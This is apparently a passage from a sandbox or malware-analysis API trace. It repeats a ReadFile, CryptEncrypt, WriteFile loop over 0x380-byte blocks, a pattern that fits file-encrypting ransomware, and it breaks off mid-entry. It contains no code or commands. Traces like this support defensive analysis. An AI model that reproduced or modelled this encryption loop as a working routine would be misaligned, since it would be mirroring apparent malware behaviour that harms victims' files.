[0269.566] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.566] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.566] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.566] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.567] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.567] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.567] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.567] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.567] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.567] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.567] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.567] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.567] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.567] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.567] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.567] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.568] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.568] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.568] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.568] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.568] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.568] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.568] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.568] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.568] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.568] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.568] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.568] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.568] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.569] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.569] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.569] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.569] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.569] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.569] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.569] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.569] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.569] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.569] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.569] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.569] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.569] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.569] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.570] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.570] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.570] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.570] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.570] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.570] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.570] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.570] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.570] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.570] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.570] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.570] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.571] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.571] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.571] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.571] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.571] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.571] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.571] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.571] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.571] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.571] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.571] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.571] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.571] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.571] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.571] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.572] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.572] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.572] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.572] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.572] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.572] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.572] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.572] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.572] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.572] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.572] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.572] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.572] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.572] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.572] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.573] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.573] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.573] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.573] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.573] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.573] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.573] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.573] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.573] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.573] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.573] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.573] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.573] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.573] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.573] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.573] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.574] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.574] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.574] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 